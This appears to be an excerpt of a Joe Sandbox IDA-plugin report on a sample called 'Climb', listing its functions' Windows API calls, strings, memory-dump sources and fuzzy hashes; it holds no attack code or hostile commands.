Part of subcall function 00111A45: GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 00111A60
Part of subcall function 00111A45: GetLastError.KERNEL32(?,00000000,00000000,?,?,001114E7,?,?,?), ref: 00111A6C
Part of subcall function 00111A45: GetProcessHeap.KERNEL32(00000008,?,?,00000000,00000000,?,?,001114E7,?,?,?), ref: 00111A7B
Part of subcall function 00111A45: HeapAlloc.KERNEL32(00000000,?,00000000,00000000,?,?,001114E7,?,?,?), ref: 00111A82
Part of subcall function 00111A45: GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 00111A99

GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 00111741
GetAclInformation.ADVAPI32(?,?,0000000C,00000002), ref: 00111775
GetLengthSid.ADVAPI32(?), ref: 0011178C
GetAce.ADVAPI32(?,00000000,?), ref: 001117C6
AddAce.ADVAPI32(?,00000002,000000FF,?,?), ref: 001117E2
GetLengthSid.ADVAPI32(?), ref: 001117F9
GetProcessHeap.KERNEL32(00000008,00000008), ref: 00111801
HeapAlloc.KERNEL32(00000000), ref: 00111808
GetLengthSid.ADVAPI32(?,00000008,?), ref: 00111829
CopySid.ADVAPI32(00000000), ref: 00111830
AddAce.ADVAPI32(?,00000002,000000FF,00000000,?), ref: 0011185F
SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000), ref: 00111881
SetUserObjectSecurity.USER32(?,00000004,?), ref: 00111893
GetProcessHeap.KERNEL32(00000000,00000000), ref: 001118BA
HeapFree.KERNEL32(00000000), ref: 001118C1
GetProcessHeap.KERNEL32(00000000,00000000), ref: 001118CA
HeapFree.KERNEL32(00000000), ref: 001118D1
GetProcessHeap.KERNEL32(00000000,00000000), ref: 001118DA
HeapFree.KERNEL32(00000000), ref: 001118E1
GetProcessHeap.KERNEL32(00000000,?), ref: 001118ED
HeapFree.KERNEL32(00000000), ref: 001118F4

Part of subcall function 00111ADF: GetProcessHeap.KERNEL32(00000008,001114FD,?,00000000,?,001114FD,?), ref: 00111AED
Part of subcall function 00111ADF: HeapAlloc.KERNEL32(00000000,?,00000000,?,001114FD,?), ref: 00111AF4
Part of subcall function 00111ADF: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001,?,00000000,?,001114FD,?), ref: 00111B03

Memory Dump Source

Source File: 00000015.00000002.2506411161.00000000000B1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 000B0000, based on PE: true

Associated: 00000015.00000002.2506297070.00000000000B0000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.2506585434.000000000014D000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.2506585434.0000000000173000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.2506749154.000000000017D000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.2506829293.0000000000185000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_b0000_Climb.jbxd

Similarity

API ID: Heap$Process$Security$Free$AllocDescriptorLengthObjectUser$Dacl$CopyErrorInformationInitializeLast
String ID:
API String ID: 4175595110-0
Opcode ID: c143664f23e5e683fb07285ae77a8bc191f39e771c6d8f80e7d36c058cad27a2
Instruction ID: b503cf4913aa59f9898c0ea2d69e00099e548985b4e5c80e14d37de9bc92edbf
Opcode Fuzzy Hash: c143664f23e5e683fb07285ae77a8bc191f39e771c6d8f80e7d36c058cad27a2
Instruction Fuzzy Hash: 9D714CB6D00209BBDF14DFA5EC44FEEBBB8AF45710F148125FA15A72A0D7319A85CB60

Function 0013CE17 Relevance: 30.2, APIs: 11, Strings: 6, Instructions: 495registryCOMMON

Download Yara Rule

APIs

RegConnectRegistryW.ADVAPI32(?,?,?), ref: 0013CF1D
RegCreateKeyExW.ADVAPI32(?,?,00000000,0014DCD0,00000000,?,00000000,?,?), ref: 0013CFA4
RegCloseKey.ADVAPI32(00000000,00000000,00000000), ref: 0013D004
_wcslen.LIBCMT ref: 0013D054
_wcslen.LIBCMT ref: 0013D0CF
RegSetValueExW.ADVAPI32(00000001,?,00000000,00000001,?,?), ref: 0013D112
RegSetValueExW.ADVAPI32(00000001,?,00000000,00000007,?,?), ref: 0013D221
RegSetValueExW.ADVAPI32(00000001,?,00000000,0000000B,?,00000008), ref: 0013D2AD
RegCloseKey.ADVAPI32(?), ref: 0013D2E1
RegCloseKey.ADVAPI32(00000000), ref: 0013D2EE
RegSetValueExW.ADVAPI32(00000001,?,00000000,00000003,00000000,00000000), ref: 0013D3C0

Strings

REG_EXPAND_SZ, xrefs: 0013D02D
REG_MULTI_SZ, xrefs: 0013D155
REG_DWORD, xrefs: 0013D264
REG_BINARY, xrefs: 0013D373
REG_SZ, xrefs: 0013D0A4
REG_QWORD, xrefs: 0013D323

Memory Dump Source

Source File: 00000015.00000002.2506411161.00000000000B1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 000B0000, based on PE: true

Associated: 00000015.00000002.2506297070.00000000000B0000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.2506585434.000000000014D000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.2506585434.0000000000173000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.2506749154.000000000017D000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.2506829293.0000000000185000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_b0000_Climb.jbxd

Similarity

API ID: Value$Close$_wcslen$ConnectCreateRegistry
String ID: REG_BINARY$REG_DWORD$REG_EXPAND_SZ$REG_MULTI_SZ$REG_QWORD$REG_SZ
API String ID: 9721498-966354055
Opcode ID: 87f22abd10cb4da074d9a0afdcbafc888e260963a57543afb666eb8902f65cd6
Instruction ID: 7fe7ed4f83101b5e911eb9e134158050a818377d6ed2d4690a500bde4deb4356
Opcode Fuzzy Hash: 87f22abd10cb4da074d9a0afdcbafc888e260963a57543afb666eb8902f65cd6
Instruction Fuzzy Hash: B81248356046019FDB14DF24D881AAAB7E5FF88714F14889DF89A9B3A2CB31FD41CB91

Function 001413BA Relevance: 30.1, APIs: 6, Strings: 11, Instructions: 372windowCOMMON

Download Yara Rule

APIs

CharUpperBuffW.USER32(?,?), ref: 00141462
_wcslen.LIBCMT ref: 0014149D
SendMessageW.USER32(?,00001105,00000000,00000000), ref: 001414F0
_wcslen.LIBCMT ref: 00141526
_wcslen.LIBCMT ref: 001415A2
_wcslen.LIBCMT ref: 0014161D

Part of subcall function 000CFD52: _wcslen.LIBCMT ref: 000CFD5D

Part of subcall function 00113535: SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00113547

Strings

GETSELECTED, xrefs: 001416EA
COLLAPSE, xrefs: 0014159D, 001415B8
SELECT, xrefs: 001417AD
EXISTS, xrefs: 00141618, 00141633
GETITEMCOUNT, xrefs: 001416BA
GETTEXT, xrefs: 00141733
GETTOTALCOUNT, xrefs: 0014148E, 001414B3
CHECK, xrefs: 00141521, 0014153C
EXPAND, xrefs: 00141694
UNCHECK, xrefs: 001417DA
ISCHECKED, xrefs: 0014177D

Memory Dump Source

Source File: 00000015.00000002.2506411161.00000000000B1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 000B0000, based on PE: true

Associated: 00000015.00000002.2506297070.00000000000B0000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.2506585434.000000000014D000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.2506585434.0000000000173000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.2506749154.000000000017D000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.2506829293.0000000000185000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_b0000_Climb.jbxd

Similarity

API ID: _wcslen$MessageSend$BuffCharUpper
String ID: CHECK$COLLAPSE$EXISTS$EXPAND$GETITEMCOUNT$GETSELECTED$GETTEXT$GETTOTALCOUNT$ISCHECKED$SELECT$UNCHECK
API String ID: 1103490817-4258414348
Opcode ID: 71abe669b6029989d614e2ff00849590b6627d52eb94aadec90fd15a65c46418
Instruction ID: 448239d729dd181ffc057d7df20406f61a2d2503471a433d84f74a92858ff65f
Opcode Fuzzy Hash: 71abe669b6029989d614e2ff00849590b6627d52eb94aadec90fd15a65c46418
Instruction Fuzzy Hash: 59E19E716083019FC714DF24C5509AAB7E2FF94314F15896DF89A9B3A2DB30ED85CB91

Function 0013D3F8 Relevance: 30.0, APIs: 7, Strings: 10, Instructions: 242COMMON

Download Yara Rule

APIs

CharUpperBuffW.USER32(?,?,?,?,?,?,?,0013C10E,?,?), ref: 0013D415
_wcslen.LIBCMT ref: 0013D451
_wcslen.LIBCMT ref: 0013D4C8
_wcslen.LIBCMT ref: 0013D4FE
_wcslen.LIBCMT ref: 0013D559
_wcslen.LIBCMT ref: 0013D58F
_wcslen.LIBCMT ref: 0013D5DF

Strings

HKEY_CURRENT_USER, xrefs: 0013D61D
HKCU, xrefs: 0013D62E
HKEY_LOCAL_MACHINE, xrefs: 0013D4C2, 0013D4C7
HKLM, xrefs: 0013D4F8, 0013D4FD
HKEY_CURRENT_CONFIG, xrefs: 0013D5D9, 0013D5DE
HKEY_CLASSES_ROOT, xrefs: 0013D553, 0013D558
HKCC, xrefs: 0013D60C
HKCR, xrefs: 0013D589, 0013D58E
HKU, xrefs: 0013D650
HKEY_USERS, xrefs: 0013D63F

Memory Dump Source

Source File: 00000015.00000002.2506411161.00000000000B1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 000B0000, based on PE: true

Associated: 00000015.00000002.2506297070.00000000000B0000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.2506585434.000000000014D000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.2506585434.0000000000173000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.2506749154.000000000017D000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.2506829293.0000000000185000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_b0000_Climb.jbxd

Similarity

API ID: _wcslen$BuffCharUpper
String ID: HKCC$HKCR$HKCU$HKEY_CLASSES_ROOT$HKEY_CURRENT_CONFIG$HKEY_CURRENT_USER$HKEY_LOCAL_MACHINE$HKEY_USERS$HKLM$HKU
API String ID: 1256254125-909552448
Opcode ID: 071f2f23cb3b673a392026acc199edf8104f125028be129ea10d6fccbcf266ca
Instruction ID: 3e6d3c3e74334f2cbf7039b55889aa8183c0ae61e4e7395af2144898775ed2ba
Opcode Fuzzy Hash: 071f2f23cb3b673a392026acc199edf8104f125028be129ea10d6fccbcf266ca
Instruction Fuzzy Hash: 5871D67260052A8BCB109F7CFA515FF33B2AB60754F220129F86AA7295FB35DD45C7A0

Function 00148D97 Relevance: 29.9, APIs: 14, Strings: 3, Instructions: 196windowlibraryCOMMON

Download Yara Rule

APIs

_wcslen.LIBCMT ref: 00148DB5
_wcslen.LIBCMT ref: 00148DC9
_wcslen.LIBCMT ref: 00148DEC
_wcslen.LIBCMT ref: 00148E0F
LoadImageW.USER32(00000000,?,00000001,?,?,00002010), ref: 00148E4D
LoadLibraryExW.KERNEL32(?,00000000,00000032,00000000,?,?,?,?,?,00146691), ref: 00148EA9
LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 00148EE2
LoadImageW.USER32(00000000,?,00000001,?,?,00000000), ref: 00148F25
LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 00148F5C
FreeLibrary.KERNEL32(?), ref: 00148F68
ExtractIconExW.SHELL32(?,00000000,00000000,00000000,00000001), ref: 00148F78
DestroyIcon.USER32(?,?,?,?,?,00146691), ref: 00148F87
SendMessageW.USER32(?,00000170,00000000,00000000), ref: 00148FA4
SendMessageW.USER32(?,00000064,00000172,00000001), ref: 00148FB0

Strings

.icl, xrefs: 00148DC3
.exe, xrefs: 00148DE3
.dll, xrefs: 00148E06

Memory Dump Source

Source File: 00000015.00000002.2506411161.00000000000B1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 000B0000, based on PE: true

Associated: 00000015.00000002.2506297070.00000000000B0000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.2506585434.000000000014D000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.2506585434.0000000000173000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.2506749154.000000000017D000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.2506829293.0000000000185000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_b0000_Climb.jbxd

Similarity

API ID: Load$Image_wcslen$IconLibraryMessageSend$DestroyExtractFree
String ID: .dll$.exe$.icl
API String ID: 799131459-1154884017
Opcode ID: cd975d84eca228f19780fdf423eacffc587984e499b67698639d201724a8e410
Instruction ID: 10b3ba4f2d813696b029932de7a853a34b52d9d7d3cc68149c685f123beabc0e
Opcode Fuzzy Hash: cd975d84eca228f19780fdf423eacffc587984e499b67698639d201724a8e410
Instruction Fuzzy Hash: 1561DE71910215BAEB14DF64DC45BFEB7B8BF09B10F108116F815E61E1DF74AA94CBA0

Function 001248BE Relevance: 28.2, APIs: 8, Strings: 8, Instructions: 205COMMON

Download Yara Rule

APIs

CharLowerBuffW.USER32(?,?), ref: 0012493D
_wcslen.LIBCMT ref: 00124948
_wcslen.LIBCMT ref: 0012499F
_wcslen.LIBCMT ref: 001249DD
GetDriveTypeW.KERNEL32(?), ref: 00124A1B
mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 00124A63
mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 00124A9E
mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 00124ACC

Strings

open, xrefs: 00124999, 0012499E
open , xrefs: 00124A2A
type cdaudio alias cd wait, xrefs: 00124A46
set cd door , xrefs: 00124A6D
wait, xrefs: 00124A89
close, xrefs: 00124943, 0012495D
closed, xrefs: 0012494D, 00124972, 0012498B, 001249C3, 001249DC
close cd wait, xrefs: 00124AB7

Memory Dump Source

Source File: 00000015.00000002.2506411161.00000000000B1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 000B0000, based on PE: true

Associated: 00000015.00000002.2506297070.00000000000B0000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.2506585434.000000000014D000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.2506585434.0000000000173000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.2506749154.000000000017D000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.2506829293.0000000000185000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_b0000_Climb.jbxd

Similarity

API ID: SendString_wcslen$BuffCharDriveLowerType
String ID: type cdaudio alias cd wait$ wait$close$close cd wait$closed$open$open $set cd door
API String ID: 1839972693-4113822522
Opcode ID: 4117cb4e37394cdc330ad4d7634d59b565829375b5f2b44144074b5c20b6e886
Instruction ID: 2db82f7a5ec73e0d5a903b1d60ba6f3eda5a26fe01a88ffc5aa65376146a97c3
Opcode Fuzzy Hash: 4117cb4e37394cdc330ad4d7634d59b565829375b5f2b44144074b5c20b6e886
Instruction Fuzzy Hash: 1D71B3726083129FC710EF24D8419ABB7F4EF98758F10892DF896972A2EB31DD45CB91

Function 00116382 Relevance: 27.2, APIs: 18, Instructions: 198windowtimeCOMMON

Download Yara Rule

APIs

LoadIconW.USER32(00000063), ref: 00116395
SendMessageW.USER32(?,00000080,00000000,00000000), ref: 001163A7
SetWindowTextW.USER32(?,?), ref: 001163BE
GetDlgItem.USER32(?,000003EA), ref: 001163D3
SetWindowTextW.USER32(00000000,?), ref: 001163D9
GetDlgItem.USER32(?,000003E9), ref: 001163E9
SetWindowTextW.USER32(00000000,?), ref: 001163EF
SendDlgItemMessageW.USER32(?,000003E9,000000CC,?,00000000), ref: 00116410
SendDlgItemMessageW.USER32(?,000003E9,000000C5,00000000,00000000), ref: 0011642A
GetWindowRect.USER32(?,?), ref: 00116433
_wcslen.LIBCMT ref: 0011649A
SetWindowTextW.USER32(?,?), ref: 001164D6
GetDesktopWindow.USER32 ref: 001164DC
GetWindowRect.USER32(00000000), ref: 001164E3
MoveWindow.USER32(?,?,00000080,00000000,?,00000000), ref: 0011653A
GetClientRect.USER32(?,?), ref: 00116547
PostMessageW.USER32(?,00000005,00000000,?), ref: 0011656C
SetTimer.USER32(?,0000040A,00000000,00000000), ref: 00116596

Memory Dump Source

Source File: 00000015.00000002.2506411161.00000000000B1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 000B0000, based on PE: true

Associated: 00000015.00000002.2506297070.00000000000B0000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.2506585434.000000000014D000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.2506585434.0000000000173000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.2506749154.000000000017D000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.2506829293.0000000000185000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_b0000_Climb.jbxd

Similarity

API ID: Window$ItemMessageText$RectSend$ClientDesktopIconLoadMovePostTimer_wcslen
String ID:
API String ID: 895679908-0
Opcode ID: 6bea0628438067679e589cdd2d54e94384bba963a2a7f170f3dda9daff7e1fe7
Instruction ID: 82db6d57136159e9614e8261e00e5bfdf63a1b30751a9de2e699d284b405ea00
Opcode Fuzzy Hash: 6bea0628438067679e589cdd2d54e94384bba963a2a7f170f3dda9daff7e1fe7
Instruction Fuzzy Hash: 0371AF31900705EFDB24DFA8DE45AAEBBF5FF48704F100928E586A29A0D776ED80CB50

Function 0013086B Relevance: 27.1, APIs: 18, Instructions: 128COMMON

Download Yara Rule

APIs

LoadCursorW.USER32(00000000,00007F89), ref: 00130884
LoadCursorW.USER32(00000000,00007F8A), ref: 0013088F
LoadCursorW.USER32(00000000,00007F00), ref: 0013089A
LoadCursorW.USER32(00000000,00007F03), ref: 001308A5
LoadCursorW.USER32(00000000,00007F8B), ref: 001308B0
LoadCursorW.USER32(00000000,00007F01), ref: 001308BB
LoadCursorW.USER32(00000000,00007F81), ref: 001308C6
LoadCursorW.USER32(00000000,00007F88), ref: 001308D1
LoadCursorW.USER32(00000000,00007F80), ref: 001308DC
LoadCursorW.USER32(00000000,00007F86), ref: 001308E7
LoadCursorW.USER32(00000000,00007F83), ref: 001308F2
LoadCursorW.USER32(00000000,00007F85), ref: 001308FD
LoadCursorW.USER32(00000000,00007F82), ref: 00130908
LoadCursorW.USER32(00000000,00007F84), ref: 00130913
LoadCursorW.USER32(00000000,00007F04), ref: 0013091E
LoadCursorW.USER32(00000000,00007F02), ref: 00130929
GetCursorInfo.USER32(?), ref: 00130939
GetLastError.KERNEL32 ref: 0013097B

Memory Dump Source

Source File: 00000015.00000002.2506411161.00000000000B1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 000B0000, based on PE: true

Associated: 00000015.00000002.2506297070.00000000000B0000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.2506585434.000000000014D000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.2506585434.0000000000173000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.2506749154.000000000017D000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.2506829293.0000000000185000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_b0000_Climb.jbxd

Similarity

API ID: Cursor$Load$ErrorInfoLast
String ID:
API String ID: 3215588206-0
Opcode ID: 258871b57f6d256e740e16bf8ad6b10dcb9a43a762d081cea2cdd172e2e75c04
Instruction ID: 57b989def32ce1a46d0360540609a70c409e8288d818726a9f317e895796571c
Opcode Fuzzy Hash: 258871b57f6d256e740e16bf8ad6b10dcb9a43a762d081cea2cdd172e2e75c04
Instruction Fuzzy Hash: AB4152B0D083196BDB109FBA8C89D6EBFE8FF08754B50452AE11CE7291DB789801CF91

Function 000D0436 Relevance: 26.3, APIs: 10, Strings: 5, Instructions: 81COMMON

Download Yara Rule

APIs

__scrt_initialize_thread_safe_statics_platform_specific.LIBCMT ref: 000D0436

Part of subcall function 000D045D: InitializeCriticalSectionAndSpinCount.KERNEL32(0018170C,00000FA0,A9E3DD2A,?,?,?,?,000F2733,000000FF), ref: 000D048C
Part of subcall function 000D045D: GetModuleHandleW.KERNEL32(api-ms-win-core-synch-l1-2-0.dll,?,?,?,?,000F2733,000000FF), ref: 000D0497
Part of subcall function 000D045D: GetModuleHandleW.KERNEL32(kernel32.dll,?,?,?,?,000F2733,000000FF), ref: 000D04A8
Part of subcall function 000D045D: GetProcAddress.KERNEL32(00000000,InitializeConditionVariable), ref: 000D04BE
Part of subcall function 000D045D: GetProcAddress.KERNEL32(00000000,SleepConditionVariableCS), ref: 000D04CC
Part of subcall function 000D045D: GetProcAddress.KERNEL32(00000000,WakeAllConditionVariable), ref: 000D04DA
Part of subcall function 000D045D: __crt_fast_encode_pointer.LIBVCRUNTIME ref: 000D0505
Part of subcall function 000D045D: __crt_fast_encode_pointer.LIBVCRUNTIME ref: 000D0510

___scrt_fastfail.LIBCMT ref: 000D0457

Part of subcall function 000D0413: __onexit.LIBCMT ref: 000D0419

Strings

InitializeConditionVariable, xrefs: 000D04B8
kernel32.dll, xrefs: 000D04A3
SleepConditionVariableCS, xrefs: 000D04C4
WakeAllConditionVariable, xrefs: 000D04D2
api-ms-win-core-synch-l1-2-0.dll, xrefs: 000D0492

Memory Dump Source

Source File: 00000015.00000002.2506411161.00000000000B1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 000B0000, based on PE: true

Associated: 00000015.00000002.2506297070.00000000000B0000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.2506585434.000000000014D000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.2506585434.0000000000173000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.2506749154.000000000017D000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.2506829293.0000000000185000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_b0000_Climb.jbxd

Similarity

API ID: AddressProc$HandleModule__crt_fast_encode_pointer$CountCriticalInitializeSectionSpin___scrt_fastfail__onexit__scrt_initialize_thread_safe_statics_platform_specific
String ID: InitializeConditionVariable$SleepConditionVariableCS$WakeAllConditionVariable$api-ms-win-core-synch-l1-2-0.dll$kernel32.dll
API String ID: 66158676-1714406822
Opcode ID: 08c1222a4698d033cb1a4feafc2bff7431c870557bd4330ad115aafb47154a9d
Instruction ID: 162b63e1a87a44ef3b876ffc52b6a3e2c9f783d8a94d488e0cf3e53621567ab6
Opcode Fuzzy Hash: 08c1222a4698d033cb1a4feafc2bff7431c870557bd4330ad115aafb47154a9d
Instruction Fuzzy Hash: 7A21C976A44715BBD7116BE4BC06BAA37E8EB05F61F00012BFD0996790DB709C818A71

Function 00113A43 Relevance: 24.9, APIs: 8, Strings: 6, Instructions: 400COMMON

Download Yara Rule

APIs

_wcslen.LIBCMT ref: 00113AD9
_wcslen.LIBCMT ref: 00113B44

Strings

TEXT, xrefs: 00113DC8
REGEXPCLASS, xrefs: 00113BA1, 00113BB2
NAME, xrefs: 00113C81, 00113C92
INSTANCE, xrefs: 00113D9F
CLASS, xrefs: 00113AD4, 00113AF1
CLASSNN, xrefs: 00113B3F, 00113B50

Memory Dump Source

Source File: 00000015.00000002.2506411161.00000000000B1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 000B0000, based on PE: true

Associated: 00000015.00000002.2506297070.00000000000B0000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.2506585434.000000000014D000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.2506585434.0000000000173000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.2506749154.000000000017D000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.2506829293.0000000000185000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_b0000_Climb.jbxd

Similarity

API ID: _wcslen
String ID: CLASS$CLASSNN$INSTANCE$NAME$REGEXPCLASS$TEXT
API String ID: 176396367-1603158881
Opcode ID: 7942ef9b18742cc13c8480e1ae105edda6d3abbe9525b5a6e971099fa1a0538a
Instruction ID: 504dce3bc6a97918500450e1a5166abeb93a80f8b75c912b25048e4533b992d9
Opcode Fuzzy Hash: 7942ef9b18742cc13c8480e1ae105edda6d3abbe9525b5a6e971099fa1a0538a
Instruction Fuzzy Hash: 82E1C231A046169BCB1C9FB4C8417EDBBB5BF14710F11813AE46AF7259EB30AEC587A0

Function 00124F05 Relevance: 24.8, APIs: 7, Strings: 7, Instructions: 309COMMON

Download Yara Rule

APIs

CharLowerBuffW.USER32(00000000,00000000,0014DCD0), ref: 00124F6C
_wcslen.LIBCMT ref: 00124F80
_wcslen.LIBCMT ref: 00124FDE
_wcslen.LIBCMT ref: 00125039
_wcslen.LIBCMT ref: 00125084
_wcslen.LIBCMT ref: 001250EC

Part of subcall function 000CFD52: _wcslen.LIBCMT ref: 000CFD5D

GetDriveTypeW.KERNEL32(?,00177C10,00000061), ref: 00125188

Strings

fixed, xrefs: 0012507A, 0012507F
network, xrefs: 001250E2, 001250E7
all, xrefs: 00124F76, 00124F7B
ramdisk, xrefs: 00125136
unknown, xrefs: 0012514D
cdrom, xrefs: 00124FD4, 00124FD9
removable, xrefs: 0012502F, 00125034

Memory Dump Source

Source File: 00000015.00000002.2506411161.00000000000B1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 000B0000, based on PE: true

Associated: 00000015.00000002.2506297070.00000000000B0000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.2506585434.000000000014D000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.2506585434.0000000000173000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.2506749154.000000000017D000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.2506829293.0000000000185000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_b0000_Climb.jbxd

Similarity

API ID: _wcslen$BuffCharDriveLowerType
String ID: all$cdrom$fixed$network$ramdisk$removable$unknown
API String ID: 2055661098-1000479233
Opcode ID: 8de8d01a41c5d88cdc6b3fd3a56b0979641b74c85605122a021de02dc3648a66
Instruction ID: b3e3976e3ca6d4953dc280ee4ae77d3d0e643ecc5649fb9b56f11bc346af85be
Opcode Fuzzy Hash: 8de8d01a41c5d88cdc6b3fd3a56b0979641b74c85605122a021de02dc3648a66
Instruction Fuzzy Hash: 32B1E3316087129FC714DF28E990AAAB7E6EFA4710F50891DF49687292E730DC54CBA2

Function 0013BA59 Relevance: 24.4, APIs: 16, Instructions: 418processCOMMON

Download Yara Rule

APIs

_wcslen.LIBCMT ref: 0013BBF8
GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 0013BC10
GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 0013BC34
_wcslen.LIBCMT ref: 0013BC60
GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 0013BC74
GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 0013BC96
_wcslen.LIBCMT ref: 0013BD92

Part of subcall function 00120F4E: GetStdHandle.KERNEL32(000000F6), ref: 00120F6D

_wcslen.LIBCMT ref: 0013BDAB
_wcslen.LIBCMT ref: 0013BDC6
CreateProcessW.KERNEL32(00000000,?,00000000,00000000,?,?,00000000,?,?,?), ref: 0013BE16
GetLastError.KERNEL32(00000000), ref: 0013BE67
CloseHandle.KERNEL32(?), ref: 0013BE99
CloseHandle.KERNEL32(00000000), ref: 0013BEAA
CloseHandle.KERNEL32(00000000), ref: 0013BEBC
CloseHandle.KERNEL32(00000000), ref: 0013BECE
CloseHandle.KERNEL32(?), ref: 0013BF43

Memory Dump Source

Source File: 00000015.00000002.2506411161.00000000000B1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 000B0000, based on PE: true

Associated: 00000015.00000002.2506297070.00000000000B0000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.2506585434.000000000014D000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.2506585434.0000000000173000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.2506749154.000000000017D000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.2506829293.0000000000185000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_b0000_Climb.jbxd

Similarity

API ID: Handle$Close_wcslen$Directory$CurrentSystem$CreateErrorLastProcess
String ID:
API String ID: 2178637699-0
